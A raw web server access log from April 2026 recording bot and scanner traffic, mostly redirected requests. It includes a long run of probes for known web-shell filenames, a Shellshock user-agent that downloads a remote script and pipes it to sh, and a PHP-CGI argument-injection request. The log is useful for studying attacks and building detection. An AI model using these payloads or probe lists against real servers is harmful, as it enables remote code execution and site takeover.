176.65.151.74 - - [04/Apr/2026:21:41:14 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.111.239.161 - - [04/Apr/2026:21:48:51 -0400] "GET /wp-login.php HTTP/1.1" 302 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.57 Safari/537.36"
95.111.239.161 - - [04/Apr/2026:21:49:02 -0400] "GET /wp-login.php HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) Gecko/20100101 Firefox/120.0.1"
95.111.239.161 - - [04/Apr/2026:21:49:36 -0400] "GET /wp-admin/ HTTP/1.1" 302 274 "https://www.reddit.com/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.88 Safari/537.36"
79.124.40.174 - - [04/Apr/2026:22:03:14 -0400] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
176.65.151.74 - - [04/Apr/2026:22:08:53 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
79.124.40.174 - - [04/Apr/2026:22:13:58 -0400] "GET /console/ HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
79.124.40.174 - - [04/Apr/2026:22:24:37 -0400] "GET /_ignition/execute-solution HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
5.133.192.200 - - [04/Apr/2026:22:29:48 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Viewer/99.9.8853.8"
176.65.151.74 - - [04/Apr/2026:22:32:11 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
79.124.40.174 - - [04/Apr/2026:22:33:47 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
172.104.210.105 - - [04/Apr/2026:22:35:44 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 zgrab/0.x"
101.32.49.171 - - [04/Apr/2026:22:37:50 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
79.124.40.174 - - [04/Apr/2026:22:42:40 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.85.112.216 - - [04/Apr/2026:22:43:31 -0400] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 302 270 "-" "libredtail-http"
106.63.26.8 - - [04/Apr/2026:22:52:02 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
106.63.26.140 - - [04/Apr/2026:22:52:22 -0400] "GET /robots.txt HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
176.65.151.74 - - [04/Apr/2026:22:58:35 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
172.236.228.245 - - [04/Apr/2026:23:09:20 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
149.86.227.60 - - [04/Apr/2026:23:10:20 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0"
79.124.40.174 - - [04/Apr/2026:23:13:57 -0400] "GET /actuator/gateway/routes HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
43.153.135.208 - - [04/Apr/2026:23:20:07 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
176.65.151.74 - - [04/Apr/2026:23:26:10 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
79.124.40.174 - - [04/Apr/2026:23:32:33 -0400] "GET /geoserver HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
106.63.26.21 - - [04/Apr/2026:23:40:14 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
106.63.26.21 - - [04/Apr/2026:23:40:29 -0400] "GET /robots.txt HTTP/1.1" 302 270 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"
176.65.151.74 - - [04/Apr/2026:23:49:35 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.130.102.7 - - [04/Apr/2026:23:51:56 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
124.198.131.185 - - [05/Apr/2026:00:10:28 -0400] "GET / HTTP/1.1" 302 390 "-" "() { :; }; /bin/bash -c \"(wget -qO- http://45.92.1.50/rondo.qre.sh?=\\7eedeb12||busybox wget -qO- http://45.92.1.50/rondo.qre.sh?=\\7eedeb12||curl -s http://45.92.1.50/rondo.qre.sh?=\\7eedeb12)|sh\"& # rondo2012@atomicmail.io"
176.65.151.74 - - [05/Apr/2026:00:15:24 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.33.14.197 - - [05/Apr/2026:00:33:26 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 zgrab/0.x"
176.65.151.74 - - [05/Apr/2026:00:39:31 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
13.201.221.136 - - [05/Apr/2026:00:43:48 -0400] "GET / HTTP/1.1" 302 390 "-" "Go-http-client/1.1"
20.104.201.101 - - [05/Apr/2026:00:48:37 -0400] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:48:45 -0400] "GET /default.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:48:50 -0400] "GET /ty.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:49:07 -0400] "GET /wp-content/themes/cay-van-phong/filemanager.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:49:36 -0400] "GET /fm.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:49:42 -0400] "GET /wp-content/plugins/seoplugins/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:49:50 -0400] "GET /ini.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:50:07 -0400] "GET /libraries/legacy/info.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:50:14 -0400] "GET /wp-content/themes/include.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:50:23 -0400] "GET /wp-admin/network/about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:50:28 -0400] "GET /alfa.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:50:40 -0400] "GET /wp-admin/images/install.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:50:42 -0400] "GET /.well-known/link.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:50:57 -0400] "GET /wp-admin/chosen.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:50:59 -0400] "GET /info.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:51:07 -0400] "GET /wp-includes/assets/about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:51:23 -0400] "GET /test.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:51:37 -0400] "GET /wp-admin/css/colors/ectoplasm/wp-login.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:51:38 -0400] "GET /Assets/item.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:51:56 -0400] "GET /shop/lock.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:52:15 -0400] "GET /th/plugins/phpThumb/404.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:52:27 -0400] "GET /wp-includes/css/dist/preferences/index.php HTTP/1.1" 302 274 "-" "-"
79.124.40.174 - - [05/Apr/2026:00:52:30 -0400] "POST / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
20.104.201.101 - - [05/Apr/2026:00:52:33 -0400] "GET /files/log.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:52:36 -0400] "GET /wp-includes/html-api/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:52:43 -0400] "GET /x.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:52:49 -0400] "GET /about/function.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:52:57 -0400] "GET /wp-content/plugins/wp.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:52:59 -0400] "GET /wp-admin/includes/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:06 -0400] "GET /wp-includes/SimplePie/Cache/content.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:08 -0400] "GET /wp-content/themes/xmrlpc.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:09 -0400] "GET /wp-includes/js/wp-login.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:13 -0400] "GET /wp-mail.php/wp-includes/ID3/taptap-null.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:21 -0400] "GET /.well-known/as.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:31 -0400] "GET /wp-includes/customize/wp-login.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:34 -0400] "GET /.well-known/lv.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:38 -0400] "GET /themes.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:46 -0400] "GET /readme.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:53:53 -0400] "GET /edit.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:54:10 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:54:30 -0400] "GET /wp-admin/wp-admin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:54:43 -0400] "GET /wp-content/upgrade/shell.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:54:52 -0400] "GET /wp-admin/user/bak.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:55:11 -0400] "GET /wp-content/plugins/admin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:55:19 -0400] "GET /wp-admin/css/about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:55:31 -0400] "GET /wp-admin/date.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:55:36 -0400] "GET /index/x.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:55:43 -0400] "GET /wp-includes/network.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:55:51 -0400] "GET /.well-known/.well-known/cc.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:55:57 -0400] "GET /wp-includes/pomo/chosen.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:55:59 -0400] "GET /.well-known/pki-validation/pwnd.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:56:02 -0400] "GET /css/cong.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:56:23 -0400] "GET /wp-includes/customize/shell.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:56:38 -0400] "GET /wp-content/mah.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:56:52 -0400] "GET /wp-content/upgrade/admin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:01 -0400] "GET /wp-content/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:05 -0400] "GET /cgi-bin/fm.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:08 -0400] "GET /wp-includes/block-supports/variations.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:12 -0400] "GET /wp-includes/rest-api/wp-login.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:26 -0400] "GET /.well-known/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:30 -0400] "GET /1.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:45 -0400] "GET /install.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:48 -0400] "GET /.well-known/pki-validation/siteindex.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:49 -0400] "GET /plugins/DaoZM.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:51 -0400] "GET /wp-admin/install.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:52 -0400] "GET /cgi-bin/1.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:53 -0400] "GET /cgi-bin/admin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:57:54 -0400] "GET /wp-content/plugins/pwnd/gecko.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:58:07 -0400] "GET /assets/item.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:58:12 -0400] "GET /wp-includes/SimplePie/system.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:58:15 -0400] "GET /about/wp-conflg.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:58:21 -0400] "GET /Assets/admin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:58:39 -0400] "GET /wp-includes/sitemaps/alfa-rex.php HTTP/1.1" 302 274 "-" "-"
102.129.223.92 - - [05/Apr/2026:00:58:42 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71"
20.104.201.101 - - [05/Apr/2026:00:58:44 -0400] "GET /wp-includes/style-engine/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:58:48 -0400] "GET /cgi-bin/about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:58:50 -0400] "GET /db.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:58:52 -0400] "GET /wp-content/blue.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:02 -0400] "GET /.well-known/pki-validation/fm.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:18 -0400] "GET /wp-content/configs.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:22 -0400] "GET /wp-includes/images/media/about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:24 -0400] "GET /cgi-bin/xmrlpc.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:26 -0400] "GET /assets/admin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:28 -0400] "GET /cgi-bin/moon.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:34 -0400] "GET /wp-includes/theme-compat/wp-login.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:36 -0400] "GET /wp-admin/plugin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:38 -0400] "GET /wp-content/admin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:42 -0400] "GET /images/autoload_classmap.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:00:59:46 -0400] "GET /radio.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:00:05 -0400] "GET /wp-content/plugins/Cache.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:00:20 -0400] "GET /wp-admin/js/widgets/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:00:38 -0400] "GET /wp-content/packed.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:00:46 -0400] "GET /wp-content/uploads/link.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:00:56 -0400] "GET /403.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:01:07 -0400] "GET /wp-content/uploads/plugins.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:01:12 -0400] "GET /wp-includes/rest-api/alfa-rex.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:01:22 -0400] "GET /gecko.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:01:29 -0400] "GET /plugin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:01:42 -0400] "GET /wp-includes/html-api/wp-login.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:01:50 -0400] "GET /Assets/edit.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:05 -0400] "GET /wp-includes/images/crystal/about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:23 -0400] "GET /wp-content/file.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:29 -0400] "GET /.well-known/pkivalidation/log.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:30 -0400] "GET /wp-includes/SimplePie/about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:33 -0400] "GET /wp-admin/packed.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:41 -0400] "GET /user.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:43 -0400] "GET /about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:48 -0400] "GET /filemanager.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:49 -0400] "GET /wp-content/config.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:50 -0400] "GET /moon.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:02:52 -0400] "GET /wp-includes/ID3/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:03:00 -0400] "GET /wp-admin/css/wp-conflg.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:03:24 -0400] "GET /wp-admin/css/colors/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:03:33 -0400] "GET /css/chosen.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:03:39 -0400] "GET /wp-includes/Requests/Utility/cc.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:03:44 -0400] "GET /wp-includes/Text/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:03:48 -0400] "GET /packed.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:03:53 -0400] "GET /wp-admin/update.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:04:09 -0400] "GET /wp-content/themes/astra/inc/fm.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:04:25 -0400] "GET /link.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:04:43 -0400] "GET /wp-content/mu-plugins/gecko.php HTTP/1.1" 302 274 "-" "-"
176.65.151.74 - - [05/Apr/2026:01:04:53 -0400] "GET / HTTP/1.1" 302 390 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
20.104.201.101 - - [05/Apr/2026:01:05:02 -0400] "GET /footer.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:05:06 -0400] "GET /wp-includes/js/codemirror/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:05:07 -0400] "GET /config.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:05:09 -0400] "GET /fw.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:05:18 -0400] "GET /post.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:05:34 -0400] "GET /wp-login.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:05:57 -0400] "GET /makeasmtp.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:06:57 -0400] "GET /admin/function.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:07:02 -0400] "GET /wp-includes/fonts/admin.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:07:10 -0400] "GET /doc.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:07:22 -0400] "GET /xmrlpc.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:07:25 -0400] "GET /wp-includes/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:07:33 -0400] "GET /wp-includes/fonts/install.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:07:48 -0400] "GET /assets/edit.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:08:03 -0400] "GET /file.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:08:08 -0400] "GET /wp-admin/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:08:11 -0400] "GET /wp-admin/user/chosen.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:08:16 -0400] "GET /wp-content/uploads/wp-conflg.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:08:33 -0400] "GET /ok.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:08:41 -0400] "GET /chosen.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:08:44 -0400] "GET /wp-includes/images/smilies/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:08:57 -0400] "GET /wp-content/themes/aahana/json.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:09:05 -0400] "GET /wp-includes/html-api/about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:09:12 -0400] "GET /wp-content/uploads/index.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:09:15 -0400] "GET /wp-includes/images/smilies/about.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:09:20 -0400] "GET /images/lmfi2.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:09:34 -0400] "GET /wp-admin/function.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:09:47 -0400] "GET /wp-includes/Text/Diff/alfa-rex.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:09:57 -0400] "GET /images/chosen.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:10:12 -0400] "GET /mah.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:10:19 -0400] "GET /images/lmfi2.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:10:28 -0400] "GET /wp-admin/function.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:10:31 -0400] "GET /wp-includes/Text/Diff/alfa-rex.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:10:46 -0400] "GET /images/chosen.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:10:55 -0400] "GET /mah.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:12:13 -0400] "GET /class-wp-html-active-formatting-elements.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:12:17 -0400] "GET /class-wp-html-attribute-token.php HTTP/1.1" 302 274 "-" "-"
20.104.201.101 - - [05/Apr/2026:01:12:27 -0400] "GET /class-wp-html-decoder.php HTTP/1.1" 302 274 "-" "-"
